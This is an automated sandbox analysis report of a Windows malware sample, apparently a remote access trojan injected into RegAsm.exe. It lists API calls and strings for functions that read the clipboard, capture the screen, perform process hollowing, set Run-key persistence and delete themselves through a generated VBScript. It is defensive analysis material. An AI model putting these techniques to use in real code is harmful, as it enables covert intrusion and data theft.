                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$Context$AcquireRandomRelease
                                  • String ID:
                                  • API String ID: 1815803762-0
                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                  Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenClipboard.USER32(00000000), ref: 0040B74C
                                  • GetClipboardData.USER32(0000000D), ref: 0040B758
                                  • CloseClipboard.USER32 ref: 0040B760
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$CloseDataOpen
                                  • String ID:
                                  • API String ID: 2058664381-0
                                  • Opcode ID: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                  • Opcode Fuzzy Hash: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                  Function 00434CB6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FeaturePresentProcessor
                                  • String ID:
                                  • API String ID: 2325560087-3916222277
                                  • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                  • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                  • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                  • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                  Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .
                                  • API String ID: 0-248832578
                                  • Opcode ID: dab0a497b08e8df346a97c8899a5e14908918034842a488b938a10d87d6eec82
                                  • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                  • Opcode Fuzzy Hash: dab0a497b08e8df346a97c8899a5e14908918034842a488b938a10d87d6eec82
                                  • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                  Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                  • String ID: JD
                                  • API String ID: 1084509184-2669065882
                                  • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                  • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                  • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                  • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                  Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: GetLocaleInfoEx
                                  • API String ID: 2299586839-2904428671
                                  • Opcode ID: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                  • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                  • Opcode Fuzzy Hash: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                  • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                  Function 004120B2 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                  • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                  • Opcode Fuzzy Hash: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                  • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                  Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                  • String ID:
                                  • API String ID: 1663032902-0
                                  • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                  • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                  • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                  • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                  Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale_abort_free
                                  • String ID:
                                  • API String ID: 2692324296-0
                                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                  • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                  • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                  Function 0041B69E Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: NameUser
                                  • String ID:
                                  • API String ID: 2645101109-0
                                  • Opcode ID: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                  • Opcode Fuzzy Hash: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                  Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                  • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                  • String ID:
                                  • API String ID: 1272433827-0
                                  • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                  • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                  • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                  • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                  Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                  • String ID:
                                  • API String ID: 1084509184-0
                                  • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                  • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                  • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                  • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                  Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.2 Pro), ref: 0040F920
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                  • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                  Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                  • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                  • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                  • Instruction Fuzzy Hash:
                                  Function 00418EB1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                  • GetIconInfo.USER32(?,?), ref: 00418FF8
                                  • DeleteObject.GDI32(?), ref: 00419027
                                  • DeleteObject.GDI32(?), ref: 00419034
                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                  • DeleteDC.GDI32(?), ref: 004191B7
                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                  • DeleteDC.GDI32(?), ref: 00419293
                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                  • String ID: DISPLAY
                                  • API String ID: 479521175-865373369
                                  • Opcode ID: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                  • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                  • Opcode Fuzzy Hash: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                  • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                  Function 0041812A Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 289libraryloaderthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                  • GetLastError.KERNEL32 ref: 004184B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                  • API String ID: 4188446516-108836778
                                  • Opcode ID: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                  • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                  • Opcode Fuzzy Hash: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                  • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                  Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                  • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 1861856835-1447701601
                                  • Opcode ID: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                  • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                  • Opcode Fuzzy Hash: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                  • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                  Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                  • ExitProcess.KERNEL32 ref: 0040D454
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                  • API String ID: 3797177996-2483056239
                                  • Opcode ID: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                  • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                  • Opcode Fuzzy Hash: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                  • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                  Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
